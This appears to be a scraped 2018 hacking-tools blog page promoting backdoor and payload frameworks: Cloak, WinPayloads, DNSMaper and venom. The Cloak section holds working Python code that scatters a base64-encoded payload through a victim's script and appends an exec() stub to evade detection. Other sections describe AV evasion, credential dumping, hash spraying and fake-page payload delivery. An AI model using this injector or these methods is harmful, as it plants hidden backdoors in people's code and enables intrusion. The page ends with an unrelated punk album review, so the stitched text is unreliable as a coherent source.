Wednesday, 15 August 2018

Cloak - An Intelligent Python Backdoors Framework

Cloak can backdoor any Python script using a few tricks together with msfvenom.

What exactly does it do?
   Cloak generates a Python payload via msfvenom and then intelligently injects it into the Python script you specify.
   To evade basic detection, Cloak splits the payload into several parts and scatters them across different places in the script. If you want the victim to run the injected script as root, Cloak can handle that too. Cloak will be upgraded further in future to support a wider range of payloads, platforms and evasion techniques.
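The split-and-scatter step described above, as an added example that is not Cloak's own code: the payload is base64-encoded, cut into fragments, each fragment is hidden as a top-level assignment somewhere in the host script (chosen with a seeded random so the result is reproducible), and a stub appended at the end reassembles and exec()s them. The host script, the fragment names `_f0`, `_f1`, ... and the harmless payload are constructed for the example and stand in for the victim's script and the msfvenom output; the stub itself (`base64` plus `exec`) is exactly what a reviewer should grep for, since scattering the fragments only defeats literal signature matching.

```python
"""Split-and-scatter injection of a payload into a Python script.

Added example, not Cloak's own code. Needs Python 3.8+ (ast end_lineno).
"""
import ast
import base64
import random

# Constructed host script standing in for the script a victim already runs.
HOST_SCRIPT = '''\
import sys

def greet(name):
    return "hello " + name

def main():
    print(greet("world"))

if __name__ == "__main__":
    main()
'''

# Constructed, harmless stand-in for the msfvenom Python payload: sets a flag.
BENIGN_PAYLOAD = "PAYLOAD_RAN = True\n"


def top_level_gaps(source):
    """1-based line numbers after which a new top-level statement can be
    inserted without landing inside an indented block."""
    return [node.end_lineno for node in ast.parse(source).body]


def inject(host_source, payload, parts=3, seed=0):
    """Return host_source with `payload` hidden in `parts` base64 fragments
    scattered between top-level statements, plus a reassembly stub at the end."""
    if not payload:
        return host_source
    encoded = base64.b64encode(payload.encode()).decode()
    parts = max(1, min(parts, len(encoded)))
    size = -(-len(encoded) // parts)                     # ceiling division
    fragments = [encoded[i:i + size] for i in range(0, len(encoded), size)]

    gaps = top_level_gaps(host_source)
    rng = random.Random(seed)                             # seeded: reproducible
    if len(gaps) >= len(fragments):
        spots = rng.sample(gaps, len(fragments))          # distinct places
    else:
        spots = [rng.choice(gaps) for _ in fragments]     # short host: reuse

    lines = host_source.splitlines()
    # Insert bottom-up so the earlier line numbers stay valid.
    for lineno, idx in sorted(zip(spots, range(len(fragments))), reverse=True):
        lines.insert(lineno, f"_f{idx} = {fragments[idx]!r}")

    # Reassembly stub: concatenates the fragments by index, decodes, exec()s.
    joined = " + ".join(f"_f{i}" for i in range(len(fragments)))
    stub = ["import base64 as _b64", f"exec(_b64.b64decode({joined}).decode())"]
    return "\n".join(lines + stub) + "\n"


def run_as_module(source):
    """Execute a script as an imported module (not __main__) and return its
    namespace, so both the host's and the payload's effects can be checked."""
    ns = {"__name__": "injected_host"}
    exec(compile(source, "<injected>", "exec"), ns)
    return ns


if __name__ == "__main__":
    print(inject(HOST_SCRIPT, BENIGN_PAYLOAD, parts=3, seed=1))
```

Running the injected script still defines `greet` and `main` as before; the only visible additions are the scattered `_f*` strings and the two-line stub at the bottom.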

Compatibility:
   Cloak works best on Linux and is compatible with both Python 2 and Python 3. Dependencies: Metasploit Framework.

Install and Run:

Contribute:
   For now, Cloak can backdoor Python scripts, but I am looking forward to doing the same for C, Bash and Perl scripts. Currently, the default connection method is HTTPS, and Cloak creates a staged reverse payload. So, of course, I will try to extend its capabilities, which also includes bypassing low-key AV solutions on Windows.

   If you like the idea, help me achieve these goals. The code is well documented, so if you want to contribute you are not going to face any problems. Modify the code, add and improve, and start a pull request.
   If you find a bug in the code, don't hesitate to open an issue.

Contact: Email: s0md3v@gmail.com Twitter: @s0md3v


And have something to say about GitHackTools or Cloak? Comment below or share this post from GitHackTools Facebook, GitHackTools Twitter and GitHackTools Google Plus.

WinPayloads - Undetectable Windows Payloads Generation

WinPayloads is written in Python 2.7.
As usual, don't upload payloads to any online virus checkers.
   VirusTotal detection (updated 30/9/2016): detected by 8 AV engines. Read here

For fully undetectable payloads, please use the stager functionality. YouTube video:

Install and Run:

Features:
 * UACBypass - PowerShellEmpire. Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
 * PowerUp - PowerShellEmpire. Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
 * Invoke-Shellcode. Copyright (c) 2012, Matthew Graeber. All rights reserved.
 * Invoke-Mimikatz. Copyright (c) 2012, Matthew Graeber. All rights reserved.
 * Invoke-EventVwrBypass. Matt Nelson (@enigma0x3)
 * Persistence - Adds payload persistence on reboot
 * Psexec Spray - Sprays hashes until a connection succeeds, then runs the payload on the target via psexec
 * Upload to local webserver - Easy deployment
 * Powershell stager - allows invoking payloads in memory & more

Check out the Wiki for installation and more!

Video and Information on Blog (OUTDATED)



Tuesday, 14 August 2018

DNSMaper - Domain Transfer Tester, Subdomain Enumeration, Banner Detection and Generation Map

DNSMaper
   DNS zone transfer test / subdomain brute force / banner (web server version) detection / map generation

Features
   DNSMaper offers the same features as many subdomain enumeration tools: DNS zone transfer vulnerability detection, subdomain enumeration and IP address resolution.

   On top of that, web server version detection, website title acquisition, latitude/longitude lookup and Google Map generation have been added.

   The subdomain enumeration part does not reinvent the wheel; it borrows code from the subbrute project.
   Because the code was written in a hurry, it has only been tested on macOS with Python 2.7; on Windows you will need to modify some of the code.
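The zone transfer test listed above, as an added example that is not DNSMaper's own code (DNSMaper borrows subbrute for enumeration; this covers only the AXFR check). It builds the AXFR query a tester sends, parses the length-prefixed TCP reply, and reports whether the server leaked the zone (answers bracketed by the zone SOA) or refused. The two sample replies for `example.com`, the nameserver names and the TEST-NET address in them are constructed; only `axfr()` touches the network.

```python
"""DNS zone-transfer (AXFR) tester using only the standard library.

Added example, not DNSMaper's own code.
"""
import socket
import struct

TYPE_A, TYPE_NS, TYPE_SOA, QTYPE_AXFR = 1, 2, 6, 252
RCODE_NOERROR, RCODE_REFUSED = 0, 5


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    labels = [l.encode() for l in name.rstrip(".").split(".")]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name at msg[off]; return (name, next_off)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # RFC 1035 compression pointer
            if end is None:
                end = off + 2                          # resume after the pointer
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (off if end is None else end)


def build_axfr_query(zone, txid=0x1234):
    """Header (1 question, no flags) + question <zone, AXFR, IN>; no TCP prefix."""
    return (struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
            + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1))


def parse_answers(msg):
    """Return (rcode, [(owner, rtype, rdata)]) for one DNS message's answers.
    A records are decoded to dotted quads; other rdata is left raw."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                # skip the question section
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        owner, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        records.append((owner, rtype, rdata))
    return flags & 0x0F, records


def zone_transfer_allowed(rcode, records):
    """A transfer succeeded iff NOERROR and the answers start with the zone SOA."""
    return rcode == RCODE_NOERROR and bool(records) and records[0][1] == TYPE_SOA


def axfr(server, zone, timeout=5):
    """Run the check against a live nameserver over TCP (RFC 5936 requires TCP);
    returns (allowed, records). Needs network, so it is not exercised offline."""
    query = build_axfr_query(zone)
    rcode, records = RCODE_NOERROR, []
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)
        f = s.makefile("rb")
        while True:
            hdr = f.read(2)
            if len(hdr) < 2:
                break
            rcode, recs = parse_answers(f.read(struct.unpack("!H", hdr)[0]))
            records.extend(recs)
            # The transfer ends when the SOA repeats; a refusal ends it at once.
            if rcode != RCODE_NOERROR or (len(records) > 1 and records[-1][1] == TYPE_SOA):
                break
    return zone_transfer_allowed(rcode, records), records


# Constructed reply from a misconfigured server: SOA, NS, A, SOA (the whole zone).
_APEX = b"\xc0\x0c"                                    # pointer to the question name
_SOA = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
        + struct.pack("!IIIII", 2018081401, 7200, 3600, 1209600, 300))


def _rr(owner, rtype, rdata, ttl=3600):
    return owner + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


_QUESTION = encode_name("example.com") + struct.pack("!HH", QTYPE_AXFR, 1)
SAMPLE_LEAK = (struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 4, 0, 0) + _QUESTION
               + _rr(_APEX, TYPE_SOA, _SOA)
               + _rr(_APEX, TYPE_NS, encode_name("ns1.example.com"))
               + _rr(encode_name("www.example.com"), TYPE_A, bytes([192, 0, 2, 10]))
               + _rr(_APEX, TYPE_SOA, _SOA))
# Constructed reply from a locked-down server: REFUSED (rcode 5), no answers.
SAMPLE_REFUSED = struct.pack("!HHHHHH", 0x1234, 0x8185, 1, 0, 0, 0) + _QUESTION
```

Against a real target you would call `axfr("<nameserver ip>", "<zone>")` once per authoritative server, since a zone is only as locked down as its least restrictive secondary.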

Install and Run:
Usage help: python dnsmaper.py -h

Demo: Test whitehouse.gov
   python dnsmaper.py whitehouse.gov

Project reference:
   DNS enumeration: https://github.com/TheRook/subbrute
   GoogleMap generates: https://x0day.me/

Author: Le4f



venom - Metasploit shellcode Generator/Compiler/Listener

venom 1.0.15 - Metasploit shellcode Generator/Compiler/Listener
   Version release : v1.0.15
   Author : pedro ubuntu  [ r00t-3xp10it ]
   Codename: Pandora's box (pithos)
   Suspicious-Shell-Activity (SSA) RedTeam develop @2018

LEGAL DISCLAIMER
The author does not hold any responsibility for the misuse of this tool; remember that attacking targets without prior consent is illegal and punishable by law.

Install and Run:
FRAMEWORK DESCRIPTION
   The script uses msfvenom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into a template (example: python; "the python function will execute the shellcode in RAM"), and uses compilers such as gcc (GNU Compiler Collection), mingw32 (a cross compiler for Windows targets) or pyinstaller to build the executable file. It also starts a multi-handler to receive the remote connection (shell or meterpreter session).
   The 'venom generator' tool reproduces some of the techniques used by Veil-Evasion.py, unicorn.py, PowerSploit, etc.

   "P.S. some payloads are undetectable by AV solutions... yes!!!"
   One reason for that is the use of a function that executes the 2nd stage of the shell/meterpreter directly in the target's RAM; the other is the use of external obfuscators/crypters.

HOW DO I DELIVER MY PAYLOADS TO THE TARGET HOST?
   venom 1.0.11 (malicious_server) was built to use the apache2 web server to deliver payloads over the LAN through a fake web page written in HTML that uses <iframe>, <meta http-equiv> or <form> tags to trigger the payload download; the user just needs to send the provided link to the target host.

   "Apache2 (malicious url) will copy all files needed to your webroot"

Screenshots:

P.V.P. - Las Reglas Del Juego 1984

Two years after the great debut, Miedo P.V.P. released their second album via 21 Records, and the nine songs are more mature; you can clearly feel the progress, which now ends up in mostly four-minute tracks, partly also very poppy. I must admit, I sometimes miss the aggressiveness and harshness of the earlier recordings, and not all of it is to my taste. Anyway, suitable for pajama parties, beach evenings, a nice evening for two or housework.